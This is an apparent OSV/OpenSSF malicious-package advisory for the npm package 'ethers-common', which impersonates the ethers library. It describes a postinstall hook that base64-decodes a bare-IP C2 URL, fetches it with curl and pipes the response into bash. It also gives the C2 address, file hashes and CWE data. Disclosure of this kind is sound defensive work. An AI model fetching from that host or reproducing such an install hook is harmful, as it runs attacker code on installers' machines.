MAL-2026-3707
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ethers-common/MAL-2026-3707.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-3707
- Published
- 2026-05-13T11:58:47Z
- Modified
- 2026-05-15T07:53:09.429195Z
- Summary
- Malicious code in ethers-common (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (9a7b953533124edcc31e4293ed6bffe010e9110d795f812ba432de8b81d4d558)
package.json declares a postinstall hook that base64-decodes the URL http://8.217.75.147:3000/payload, fetches it via curl over plain HTTP, and pipes the response directly into bash. This executes attacker-controlled code on every installer's machine at
npm installtime, with no integrity verification and an obfuscated (base64) destination. The package itself is a hollow lure: index.js exports an empty object, and the package name and description ("Utilities for Web3/ethers development") impersonate the well-knownethersWeb3 library to bait installs. The combination of bare-IP C2, plain HTTP, base64-obfuscated URL, curl|bash dropper in a lifecycle hook, and an empty cover-story library is unambiguous supply-chain attack.Source: ossf-package-analysis (48af3bdbd3b7966516ff3ab4baf1a946a38ce1735dc0c8fb41b2bc9abfa30449)
The OpenSSF Package Analysis project identified 'ethers-common' @ 1.0.0 (npm) as malicious.
It is considered malicious because:
- The package executes one or more commands associated with malicious behavior.
- Database specific
{ "malicious-packages-origins": [ { "import_time": "2026-05-13T21:58:24.228904145Z", "sha256": "48af3bdbd3b7966516ff3ab4baf1a946a38ce1735dc0c8fb41b2bc9abfa30449", "source": "ossf-package-analysis", "modified_time": "2026-05-13T11:58:47Z", "versions": [ "1.0.0" ] }, { "import_time": "2026-05-13T21:58:24.971817131Z", "sha256": "9e00b24a32d5d4b92af87962a2fa77bc1f04e333744e353363356c1ba22f566e", "source": "ossf-package-analysis", "modified_time": "2026-05-13T12:00:47Z", "versions": [ "2.0.0" ] }, { "id": "IN-MAL-2026-002710", "import_time": "2026-05-15T07:37:17.652338172Z", "sha256": "0b13b1ccfe277b0f90374ea218d61f0b9f61ddef086b2444a679913a6551ac21", "source": "amazon-inspector", "modified_time": "2026-05-14T19:25:17Z", "versions": [ "1.0.0" ] }, { "id": "IN-MAL-2026-002807", "import_time": "2026-05-15T07:37:20.144273474Z", "sha256": "9a7b953533124edcc31e4293ed6bffe010e9110d795f812ba432de8b81d4d558", "source": "amazon-inspector", "modified_time": "2026-05-15T03:08:28Z", "versions": [ "1.0.0" ] } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
- OpenSSF: Package Analysis - FINDER
-
Affected packages
npm / ethers-common
Package
- Name
- ethers-common
- View open source insights on deps.dev
- Purl
- pkg:npm/ethers-common
Database specific
cwes
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]
indicators
{
"evidence_files": [
{
"path": "package.json",
"sha256": "78c042ae0304ee61a00ec5eb1b5d7c64892b6aa61e3a388902439f6118193961",
"tlsh": "34f0ab009b506ab328c49f920e1ea6cb6073891700587c54b38fa06d03dd7af14ff55e"
}
],
"package_integrity": [
{
"filename": "ethers-common-1.0.0.tgz",
"hashes": {
"sha512_sri": "sha512-J9u5EDtc+Vh39s9ww94BquNv+4/m/BzKkuFjZBZPbnpAQSVioTcDVP+KBSMj+mOoa+9eTJbQ2KEROpN8TgXcJg==",
"sha1": "d6049be5c41b2bdde1f0a2429665b0386a9d1b55"
}
}
]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ethers-common/MAL-2026-3707.json"